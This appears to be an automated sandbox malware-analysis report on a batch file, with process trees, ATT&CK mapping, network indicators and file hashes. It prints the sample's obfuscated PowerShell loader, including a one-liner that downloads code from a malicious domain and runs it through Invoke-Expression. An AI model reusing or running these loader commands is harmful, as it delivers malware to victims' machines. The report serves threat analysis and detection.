Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded function bDXvV($kCrbx) {return [char]::ConvertFromUtf32($kCrbx)}&((bDXvV(0x69))+(bDXvV(0x65))+(bDXvV(0x78)))((bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x61))+(bDXvV(0x72))+(bDXvV(0x74))+(bDXvV(0x2d))+(bDXvV(0x50))+(bDXvV(0x72))+(bDXvV(0x6f))+(bDXvV(0x63))+(bDXvV(0x65))+(bDXvV(0x73))+(bDXvV(0x73))+(bDXvV(0x20))+(bDXvV(0x22))+(bDXvV(0x24))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x76))+(bDXvV(0x3a))+(bDXvV(0x57))+(bDXvV(0x49))+(bDXvV(0x4e))+(bDXvV(0x44))+(bDXvV(0x49))+(bDXvV(0x52))+(bDXvV(0x5c))+(bDXvV(0x53))+(bDXvV(0x79))+(bDXvV(0x73))+(bDXvV(0x57))+(bDXvV(0x4f))+(bDXvV(0x57))+(bDXvV(0x36))+(bDXvV(0x34))+(bDXvV(0x5c))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x73))+(bDXvV(0x50))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x53))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x5c))+(bDXvV(0x76))+(bDXvV(0x31))+(bDXvV(0x2e))+(bDXvV(0x30))+(bDXvV(0x5c))+(bDXvV(0x70))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x73))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x2e))+(bDXvV(0x65))+(bDXvV(0x78))+(bDXvV(0x65))+(bDXvV(0x22))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x79))+(bDXvV(0x6c))+(bDXvV(0x65))+(bDXvV(0x20))+(bDXvV(0x48))+(bDXvV(0x69))+(bDXvV(0x64))+(bDXvV(0x64))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x41))+(bDXvV(0x72))+(bDXvV(0x67)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e [Base64-encoded command]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
[Behavior graph. ID: 1670572; Sample: malicious.bat; Startdate: 21/04/2025; Architecture: WINDOWS; Score: 60. Top-level signatures: Antivirus detection for URL or domain; Sigma detected: Suspicious PowerShell Parameter Substring; Joe Sandbox ML detected suspicious sample. Process chain: cmd.exe (Encrypted powershell cmdline option found) started powershell.exe and conhost.exe; that powershell.exe (Encrypted powershell cmdline option found) started a second powershell.exe, which started a third powershell.exe; the third powershell.exe started conhost.exe and contacted qqcxq1.dyheg.fun (172.67.212.124, ports 443 and 49747, CLOUDFLARENETUS, United States).]

| Source | Detection | Scanner | Label | Link |
| SAMPLE | 100% | Joe Sandbox ML | | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| http://pesterbdd.com/images/Pester.pngh | 0% | Avira URL Cloud | safe | |
| https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt | 100% | Avira URL Cloud | malware | |
| https://qqcxq1.dyheg.fun | 100% | Avira URL Cloud | malware | |
| https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca | 100% | Avira URL Cloud | malware | |
| https://qqcxq1.dyheg.fun/7721 | 100% | Avira URL Cloud | malware | |
| https://qqcxq1.dyh | 0% | Avira URL Cloud | safe | |
| https://oneget.org | 0% | Avira URL Cloud | safe | |


| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| qqcxq1.dyheg.fun | 172.67.212.124 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt | true | Avira URL Cloud: malware | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
| http://pesterbdd.com/images/Pester.png4 | powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.64957011856.0000018635196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.00000186425D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.0000018642753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.64957011856.0000018634C58000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca | powershell.exe, 00000005.00000002.65025060540.0000000008805000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://go.micro | powershell.exe, 00000004.00000002.64957011856.000001863375E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://pesterbdd.com/images/Pester.pngh | powershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://contoso.com/License | powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/Icon | powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html4 | powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester4 | powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.64978795934.0000000004B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pesterh | powershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.64957011856.0000018635196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.00000186425D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.0000018642753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.00000000053EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.htmlh | powershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.quovadis.bm0 | powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/PesterXz | powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://qqcxq1.dyh | powershell.exe, 00000004.00000002.64957011856.0000018633C55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown |
| https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.65025026617.0000029080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.0000018632471000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://qqcxq1.dyheg.fun/7721 | powershell.exe, 00000004.00000002.64957011856.0000018633C55000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.65025026617.0000029080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.0000018632471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://oneget.org | powershell.exe, 00000004.00000002.64957011856.0000018634C58000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://qqcxq1.dyheg.fun | powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmp | false | | high |

| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| 172.67.212.124 | qqcxq1.dyheg.fun | United States | | 13335 | CLOUDFLARENETUS | true |

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1670572
Start date and time: 2025-04-21 21:57:28 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: malicious.bat
Detection: MAL
Classification: mal60.evad.winBAT@9/10@1/1
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 12
  • Number of non-executed functions: 1
Cookbook Comments:
  • Found application associated with file extension: .bat
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Execution Graph export aborted for target powershell.exe, PID 4296 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 7232 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
  • Not all processes where analyzed, report is missing behavior information

| Time | Type | Description |
| 15:59:37 | API Interceptor | 23x Sleep call for process: powershell.exe modified |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 172.67.212.124 | Paystub_#38920011_2023-09-14T143803.htm | malicious | Unknown | |

No context

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| CLOUDFLARENETUS | https://cpcontacts.diercusn.com/Downloads/test.pdf.lnk | malicious | Unknown | 104.21.80.1 |
| CLOUDFLARENETUS | STATEMENT COMPLETED_DOCUMENT.rtf | malicious | Unknown | 104.16.123.96 |
| CLOUDFLARENETUS | STATEMENT COMPLETED_DOCUMENT.rtf | malicious | Unknown | 104.16.123.96 |
| CLOUDFLARENETUS | https://protect-usb.mimecast.com/s/gAmYCyp4MQUKnmErfZfJcx9wip | malicious | Unknown | 1.1.1.1 |
| CLOUDFLARENETUS | https://statment-two.vercel.app/doc/statements_9909876.pdf.exe | malicious | Unknown | 104.26.0.188 |
| CLOUDFLARENETUS | http://dashes.cc/srv/log | malicious | Unknown | 104.21.6.12 |
| CLOUDFLARENETUS | phish_alert_iocp_v1.4.48 (67).eml | malicious | Unknown | 172.64.41.3 |
| CLOUDFLARENETUS | http://vertequipment.com | malicious | Unknown | 172.67.173.199 |
| CLOUDFLARENETUS | Signature Required(3 pages).pdf | malicious | Gabagool | 172.67.69.226 |
| CLOUDFLARENETUS | SWIFT_MT103_USD45800.exe | malicious | FormBook | 104.21.50.77 |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 3b5074b1b5d032e5620f69f9f700ff0e | Payment reciept.pdf.exe | malicious | MSIL Logger, MassLogger RAT | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | BEPZA MT103 Credit.pdf.exe | malicious | MSIL Logger, MassLogger RAT | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.Mardom.PN.11.17656.13789.exe | malicious | MSIL Logger, MassLogger RAT | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | tos.js.ps1 | malicious | Unknown | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | 3453 invoice&packing list.exe | malicious | AgentTesla | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.suspected.of.Trojan.MSIL.MAComb.Heur.7895.12523.exe | malicious | Unknown | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.suspected.of.Trojan.MSIL.MAComb.Heur.7895.12523.exe | malicious | Unknown | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.BackDoor.SiggenNET.71.1887.20790.exe | malicious | Unknown | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.MulDrop30.46617.18825.26126.exe | malicious | KeyLogger, StormKitty, VenomRAT | 172.67.212.124 |
| 3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win64.MalwareX-gen.5286.9423.exe | malicious | LummaC Stealer | 172.67.212.124 |

No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (27124), with CRLF line terminators
Category: dropped
Size (bytes): 55002
Entropy (8bit): 3.940847564880843
Encrypted: false
SSDEEP: 192:BSECjfdIkoNEfc5HXCgo7/l707A5CpgSECjfdIkoNEfc5HXCgo7/l707A5CpXC:kBdCBdgC
MD5: 6522D2110967B09CD9EF57E59DF872FA
SHA1: CF8DE0EBC5903D7C127A61506E103B0B6497BB4D
SHA-256: 78DA86489D1C637E83E99386C5888B3F5EE5F6871DEC7DA3898BE15C0E906B23
SHA-512: 54316CD473762340C46539CD272A1E6BA9F49092DDD4C66367F1A609FE8E8072DC5D9B4F3E182AAD79413CB141741D12A4DCDEBAD9F98FD3ED95C8D77D10461F
Malicious: false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20250421155937..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: CLIENT-OF9976 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 powershell -w h -e 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

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (665), with CRLF line terminators
Category: dropped
Size (bytes): 4816
Entropy (8bit): 5.542759309547369
Encrypted: false
SSDEEP: 96:BZwMqNhlrEn8HT45O3SzUzo1Z3lrEn8HT45O3SVZNMqNhlrEn8HT45O3SzUzo1Z3:0rEn8HTwO3QrEn8HTwO30rEn8HTwO3qD
MD5: 7146DEFD5986023D68F0F30213C22C4F
SHA1: D1101912BCCFF9687B4A88DE068403B2B0D9DEC1
SHA-256: CB9C0DF8948562932AC3707A7AFAF75C0149D61C7B1AB539C84B46083239BB81
SHA-512: F3E81354BE460F13386E33BA4B38493B0F4B39A55E9B9B1B3F6ADA7E4E79F8B6658779259D83F1DABFC8AB08E4CB8E00F90440A5ED8B748E054A3D6B8AC0EBA7
Malicious: false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20250421155938..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: CLIENT-OF9976 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)..Process ID: 4296..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (27108), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):38074
                                                    Entropy (8bit):4.687222465717669
                                                    Encrypted:false
                                                    SSDEEP:192:NSECjfdIkoNEfc5HXCgo7/l707A5CpNXo2B6AZdcrVC+LIfW9uv74mmZyLk:wBdu42B6AZdcrVC+LIfW9uv74mmZyLk
                                                    MD5:55A4ED230FA8DAEF54DD95CA2F274D43
                                                    SHA1:7703B2A36997A9FC33756549532684B21110FCE5
                                                    SHA-256:2CD2106B203591CFA06EF2A58FDB438F432824E5D4689FD8D035611779F5B28E
                                                    SHA-512:322793BBD3A14A9E4DBA24CFBABCE0F35786D70D6BED6DF5A1D830E36BBF617B6679A0D33B4D51D716469181A67876CE2793A1A3A4B30F095683350DCF30844B
                                                    Malicious:false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20250421155937..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: CLIENT-OF9976 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAH
                                                    File type:ASCII text, with very long lines (27108), with no line terminators
                                                    Entropy (8bit):3.857602594372497
                                                    TrID:
                                                      File name:malicious.bat
                                                      File size:27'108 bytes
                                                      MD5:693f86f667d508d9b9f3b8a00cdd1bb3
                                                      SHA1:127ab3dc1f6830d309db566178b36ccf05d46c6f
                                                      SHA256:59161a726bdcbab80697f632c77780d432cdaf0333eb9574172fd71a12a1c64e
                                                      SHA512:f9c5c0cc96cb3049a065e9fa4152ab883053ceb3159d8382b40caaa478ff9c94c4c0d4dfceaa38f24848b935b4f7fc64a8d84284bf8cf8e9930f17636ee1875f
